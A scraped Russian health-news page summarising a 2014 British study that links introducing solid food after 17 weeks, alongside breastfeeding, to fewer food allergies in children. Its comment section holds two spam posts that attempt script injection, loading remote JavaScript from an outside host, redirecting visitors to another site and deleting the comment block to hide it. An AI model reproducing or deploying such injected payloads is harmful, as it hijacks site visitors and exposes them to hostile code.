Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Твердая пища поможет избе...  >>  Твердая пища поможет избежать аллергий у детей
 
Обратная связь
 

Твердая пища поможет избежать аллергий у детей

Размер шрифта
22 апреля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Введение твердого прикорма в рацион малыша после 17 недели жизни в сочетании с грудным вскармливанием приводит к снижению частоты развития аллергических реакций, – считают ученые из Великобритании.

Твердая пища поможет избежать аллергий у детей

Исследовательскую группу возглавила Кэйт Гримшоу, диетолог, один из научных сотрудников Саутгемптонского университета (Великобритания). Результаты проведенной работы свидетельствуют о том, что грудное вскармливание и твердая пища совместно могут способствовать адекватному развитию иммунной системы, но только в том случае, если вводить прикорм после 17 недели.

«По всей видимости, в тот период, когда ребенок ест одновременно и материнское молоко, и твердую пищу, его иммунная система обучается грамотному распознаванию «врагов» и «друзей», – поясняет Гримшоу. «Однако срок – после 17 недель – имеет крайне важное значение, ведь прикорм является источником потенциальных аллергенов. Молоко же, напротив, усиливает механизмы иммунной переносимости; в результате, на стыке этих противоположностей и формируется стабильный иммунитет, который не спешит разнести в клочья все, что попадает в его поле зрения», – рассказывает доктор Гримшоу.

Младенческий организм крайне часто иммунологически нетолерантен к твердой пище до шестимесячного возраста. Считается, что это связано с тем, что кишка ребенка еще не полностью сформирована к этому моменту, что и приводит к появлению симптомов пищевой аллергии.

Ученые обратились к материалам крупного эпидемиологического исследования под названием «PIFA», которое проводилось в графстве Хэмпшир. Авторов интересовала информация о 1 140 детях самого младшего возраста. Из них у 41 ребенка развилась пищевая аллергия к двухлетнему возрасту. Ученые сравнили диету этих детей с рационом других малышей, которым удалось благополучно избежать аллергических реакций на пищу.

Гримшоу и ее коллеги обнаружили, что дети, у которых развилась пищевая аллергия, начинали есть твердую пищу раньше (до 16 недель), чем те, у кого такой проблемы в конечном итоге не возникло. Также с аллергией чаще сталкивались те дети, которых не кормили грудью после введения в рацион коровьего молока в любом виде.

Результаты данного исследования находятся в полном соответствии с рекомендациями Американской педиатрической академии и Европейского сообщества детской гастроэнтерологии, гепатологии и диетологии, в которых, во-первых, однозначно оговаривается срок введения прикорма – не ранее 4-6 месяцев, а во-вторых, черным по белому написано: прикорм не является поводом прекращать грудное вскармливание.

Напротив, его обязательно нужно продолжить, чтобы иммунная система вашего малыша развивалась правильно и гармонично.

Как стать идеальной мамой? Узнайте ответ на страницах нашего специального проекта «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:41

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Всего лишь одно изменение в жизни поможет избежать выкидыша!   Синдром Дауна может быть излечим! Новости из США!   Вакцина, которую должен сделать каждый!   Учителя, которые запугивают детей, снижают баллы на ЕГЭ! Остановите их, пока не поздно!  
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 03 октября 2013Результаты благотворительного марафона «Всем миром»
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Можно ли подгадать с беременностью?
Первые шаги вашего малыша
Какой бутылкой кормить ребенка?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.